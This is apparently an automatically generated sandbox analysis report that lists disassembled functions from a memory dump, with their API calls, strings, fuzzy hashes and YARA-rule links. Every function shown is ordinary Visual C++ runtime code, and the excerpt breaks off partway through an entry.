Opcode Fuzzy Hash: e9fe979866d34cc28546dd583a4ac564ffe356afa36d492bce134b9c5b4beaf5
Instruction Fuzzy Hash: 8301C4359006158FCB05DBE8D8646FE7779BF84354F244909E811AB2C0CF309AC5FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E18C1D9, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E18C1E0

Part of subcall function 6E18C465: __EH_prolog3.LIBCMT ref: 6E18C46C

Part of subcall function 6E18DBBD: __EH_prolog3.LIBCMT ref: 6E18DBC4

Strings

*, xrefs: 6E18C25A
{, xrefs: 6E18C210
+, xrefs: 6E18C27C
?, xrefs: 6E18C238

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: *$+$?${
API String ID: 431132790-3939840847
Opcode ID: 84c0367f836d9be2f69c34f507d4f954049a4fbadc28783639d4f5515cb14cb3
Instruction ID: 348826ce164f9c967a6a8d37dedf218a1333d9c78583df21621c0c2facd33cdd
Opcode Fuzzy Hash: 84c0367f836d9be2f69c34f507d4f954049a4fbadc28783639d4f5515cb14cb3
Instruction Fuzzy Hash: 0E61E170D002499ADB50CFE8C4907FFBBFAAB65304F60061AD865AB145C73549C7AF17

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6898, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,6E222502,00000104), ref: 6E1E68F5

Strings

<program name unknown>, xrefs: 6E1E6904
Runtime Error!Program: , xrefs: 6E1E68C1
..., xrefs: 6E1E6943
Microsoft Visual C++ Runtime Library, xrefs: 6E1E698A

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 48bbea97a8bc77ad76354d1c21f17f9853c0fae8694f9b2783a72ed7a5258365
Instruction ID: fe4043f2db712612744fa1f0e60871af53f051d7eb9fed57ecb1bf02fc619705
Opcode Fuzzy Hash: 48bbea97a8bc77ad76354d1c21f17f9853c0fae8694f9b2783a72ed7a5258365
Instruction Fuzzy Hash: DE214FB3920A09AFD61055E28C09F9B66EC9B91754F940821FE06D7904F712CAD1E1E7

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F4A3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19F4AA

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

_Getvals.LIBCPMT ref: 6E19F4FC
_Mpunct.LIBCPMT ref: 6E19F537
_Mpunct.LIBCPMT ref: 6E19F551

Strings

$+xv, xrefs: 6E19F55C

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Mpunct$GetvalsH_prolog3_strlen
String ID: $+xv
API String ID: 3541430992-1686923651
Opcode ID: 44bc046578281575b26f800480909c616a9e22e631b1f75e365d86d8c3db60a8
Instruction ID: 60107d9ff18ab076fb4958b54da8db144e89a059af177630ca9ac3b84e722bf1
Opcode Fuzzy Hash: 44bc046578281575b26f800480909c616a9e22e631b1f75e365d86d8c3db60a8
Instruction Fuzzy Hash: 4C21A3A5504B526FD721CFB4C4907BBBEECBB0C604B14491AE0A9C7A41D734EA81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B5AF5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E1B5BB6,00000000,?,00000001,00000000,?,6E1B5CE9,00000001,FlsFree,6E1F37B8,6E1F37C0,00000000), ref: 6E1B5B85

Strings

api-ms-, xrefs: 6E1B5B45

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 84020f8ba3a609f5c7fec98ed60afc80cd3d2e77f2ec910668fa37840cdba724
Instruction ID: 0f11c749010a080f08247bc4515e8bc3521f847c9dfa1f4ac25ec39cefa55263
Opcode Fuzzy Hash: 84020f8ba3a609f5c7fec98ed60afc80cd3d2e77f2ec910668fa37840cdba724
Instruction Fuzzy Hash: E711A331A44625AFDF528BE8CD44B4D77A6BB12770F250520F910E7284D770ED81AAE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4326, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6E1D42DF), ref: 6E1D4335
GetLastError.KERNEL32(?,6E1D42DF), ref: 6E1D433F
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6E1D437D

Strings

api-ms-, xrefs: 6E1D434C
ext-ms-, xrefs: 6E1D4362

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 54a439a5eb61a4ffca15b75095d66af0ea99a587d13740a210f23f59ea50483c
Instruction ID: 80c2686fc20570c361d0179c8d5e4627506708541cb712a41bfed3be3ac590e5
Opcode Fuzzy Hash: 54a439a5eb61a4ffca15b75095d66af0ea99a587d13740a210f23f59ea50483c
Instruction Fuzzy Hash: D9F03030A44215FBFF101BE1DC0AB593E9DEB60B50F248820F91CE80D4EB75E5E6B596

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CD9EC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E1CD9BF,00000008,?,6E1CD987,?,E402A6C3,00000008), ref: 6E1CDA01
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E1CDA14
FreeLibrary.KERNEL32(00000000,?,?,6E1CD9BF,00000008,?,6E1CD987,?,E402A6C3,00000008), ref: 6E1CDA37

Strings

mscoree.dll, xrefs: 6E1CD9FA
CorExitProcess, xrefs: 6E1CDA0C

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c8f46bc83db459676cc84c1cfc41091ffac66d675a09d4f63a626bc7f29971fd
Instruction ID: a34fb5f70d2611095a988e7b45c3197e349c13feca09439e20a72aa788ba18f5
Opcode Fuzzy Hash: c8f46bc83db459676cc84c1cfc41091ffac66d675a09d4f63a626bc7f29971fd
Instruction Fuzzy Hash: 6FF08C30500519FBDF019BD1C919BDE7BA9EB11B56F108060F805E1190CB74CF81FA92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DA8CA, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1DA94C
_free.LIBCMT ref: 6E1DA970
_free.LIBCMT ref: 6E1DAAFD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E1F61D0), ref: 6E1DAB0F
_free.LIBCMT ref: 6E1DACC9

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: a47f794b13e7643d4ffc4428831ac0f7e468c92878a88fa722e4bbcc8cb0f745
Instruction ID: 0c10d7a81cc5c0084ec38bc40a01086d74896ab69673fe2ffa9a7063b90b864c
Opcode Fuzzy Hash: a47f794b13e7643d4ffc4428831ac0f7e468c92878a88fa722e4bbcc8cb0f745
Instruction Fuzzy Hash: DFC16A72904205AFDB14CFF8C850ADEBBBEEF16314F244969D491D7280E7358ACAE750

Uniqueness

Uniqueness Score: -1.00%

Function 6E196C85, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?), ref: 6E196D10
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 6E196D9E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E196E10
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 6E196E2A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E196E8D

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: fcf76f7c005852f0c8d54821da82452fb4fe7fbab587ea8ce215af2056e665c1
Instruction ID: dde772487fc6bbaf4973b3aab9e5eee6f2a558edef38372391c1d2325e672a61
Opcode Fuzzy Hash: fcf76f7c005852f0c8d54821da82452fb4fe7fbab587ea8ce215af2056e665c1
Instruction Fuzzy Hash: 9071CF32D2021E9BEF11CEE5CD60AEE7BB9AF26714F210419E864A7150D7358884FBF0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0995, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D1C1E: HeapAlloc.KERNEL32(00000000,6E17DCEA,00000001,?,6E1A963B,6E17DCEA,?,6E186103,00000054,00000000,6E184386,?,00000000,?,?,00000058), ref: 6E1D1C50

_free.LIBCMT ref: 6E1D0AA4
_free.LIBCMT ref: 6E1D0ABB
_free.LIBCMT ref: 6E1D0AD8
_free.LIBCMT ref: 6E1D0AF3
_free.LIBCMT ref: 6E1D0B0A

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocHeap
String ID:
API String ID: 1835388192-0
Opcode ID: 54200c09fd55c188cbe57c9b5623cffe2d50698833e004af8ca8ce14bc26b9df
Instruction ID: a3a97e66f936e002aa13df797db6e62a2e294e166136d9327b85320cdf67eea7
Opcode Fuzzy Hash: 54200c09fd55c188cbe57c9b5623cffe2d50698833e004af8ca8ce14bc26b9df
Instruction Fuzzy Hash: 0A51E432A00605EFDB10CFA9C840BAA77FAFF54324F144569E409DB290F771E989EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E182211, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E182218
std::_Lockit::_Lockit.LIBCPMT ref: 6E182223

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E182273
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182293
Concurrency::cancel_current_task.LIBCPMT ref: 6E1822A0

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: c855749f329cab3a8af92f33085475a656ccf94253a1ea9aedb5e168c1791845
Instruction ID: a1c5c04b8f7cacb13ccf52ad92906ac4f23d7afc9012219eb88af9d8b177d68d
Opcode Fuzzy Hash: c855749f329cab3a8af92f33085475a656ccf94253a1ea9aedb5e168c1791845
Instruction Fuzzy Hash: AC112B71900626DFCB06CFF898500EEBB797F45314B24094AE421EB290DB308AC5EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1826F0, Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1826F7
std::_Lockit::_Lockit.LIBCPMT ref: 6E182702

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E182752
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182772
Concurrency::cancel_current_task.LIBCPMT ref: 6E18277F

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 5518e8f0ca169ca9227109ca0fd75ee9b632d1c5b94e872b0a8116ad29141877
Instruction ID: 95efa4473a0e03fdf37a2baab2f2eb4755bf8ab7ec64fe845c331970b74d54b9
Opcode Fuzzy Hash: 5518e8f0ca169ca9227109ca0fd75ee9b632d1c5b94e872b0a8116ad29141877
Instruction Fuzzy Hash: 00110275D0062ADBCF06DFE8C8508EEBB797F55314B204A49E465EB290DB308AC8EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E182379, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E182380
std::_Lockit::_Lockit.LIBCPMT ref: 6E18238B

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1823DB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1823FB
Concurrency::cancel_current_task.LIBCPMT ref: 6E182408

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 57f7c24ffcaa6de396fc11e65a3e9506b02c6999f4c9fd8cf668a6f396cbd089
Instruction ID: f57d229806c838259bed4717528a27fa39c4b0a212f0c76f997c151b2c6e0699
Opcode Fuzzy Hash: 57f7c24ffcaa6de396fc11e65a3e9506b02c6999f4c9fd8cf668a6f396cbd089
Instruction Fuzzy Hash: DD11C67190062ADBCB06CFE8C8504EE7779BF49314B204959E525EB280DB308AC5EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D7B0B, Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 6E1D7B21
GetLastError.KERNEL32(?,?,?), ref: 6E1D7B2B
__dosmaperr.LIBCMT ref: 6E1D7B32
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 6E1D7B50
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 6E1D7B76

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: 5906739671c87ca5762e45f58d2a7f415b177d53b98dc2051cf7fade96d15664
Instruction ID: 8dd71ab0ca00c2d6bad599db4cb45dfa71971bbc776eba5c540125581749b158
Opcode Fuzzy Hash: 5906739671c87ca5762e45f58d2a7f415b177d53b98dc2051cf7fade96d15664
Instruction Fuzzy Hash: 72015371801519BBDF10AFE5CC488DF3E3DFF02760F208606B92496190D7308A80EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E182A2B, Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E182A32
std::_Lockit::_Lockit.LIBCPMT ref: 6E182A3D

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E182A8D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182AAD
Concurrency::cancel_current_task.LIBCPMT ref: 6E182ABA

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: db007c585a72c627721c9ea7a461767b91bc40d17ac404958e42da440e8462ee
Instruction ID: 2e6e07aba4ac90b499b5bd709a74e824e41124fdd0be9dea2a1e020004dbd3df
Opcode Fuzzy Hash: db007c585a72c627721c9ea7a461767b91bc40d17ac404958e42da440e8462ee
Instruction Fuzzy Hash: C711A57590062ADBCB16DFE8C8505EEB77A7F44714B204A49D426EB2C0DB308A85EF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1813A3, Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1813AA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1813B5

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E181405
std::_Lockit::~_Lockit.LIBCPMT ref: 6E181425
Concurrency::cancel_current_task.LIBCPMT ref: 6E181432

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: f80aebf10a951f3fbe918898240e3c7fe494f92c7f1a98ba707dc0e88364cf8d
Instruction ID: c8bd9356940136bb753bf213a0bbd8adf3925c21c72c38f7fddb34a99ad4d216
Opcode Fuzzy Hash: f80aebf10a951f3fbe918898240e3c7fe494f92c7f1a98ba707dc0e88364cf8d
Instruction Fuzzy Hash: 1B11A975A0052ADBCB06DFE8C8504EEB7797F55314B204959D435EB2C0DB308A85EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E198FF6, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198FFD
std::_Lockit::_Lockit.LIBCPMT ref: 6E199007

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199058
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199078
Concurrency::cancel_current_task.LIBCPMT ref: 6E199085

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 6480251dad5582d50fc2f18eaa1c267b87ecd812838b69d953be792aa9dda9cf
Instruction ID: 6243579b6b5e705e895e802f865cb29328ee66af3bf37011419314ccd3b0cbf8
Opcode Fuzzy Hash: 6480251dad5582d50fc2f18eaa1c267b87ecd812838b69d953be792aa9dda9cf
Instruction Fuzzy Hash: D901C435A001159FCF05DBE4C824AFE77BEAF84364F244809E825AB280CF719AC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5D1E, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5D25
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5D2F

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1A5D80
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5DA0
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5DAD

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 9067be3ae5c0c1c7dcdebd773305989235912e30f6b5d4d57de95c100dd03434
Instruction ID: a98182c47b4f44d21e2c1cbe93dd102e3b1d75bfc74c289e3b05ad0105120b69
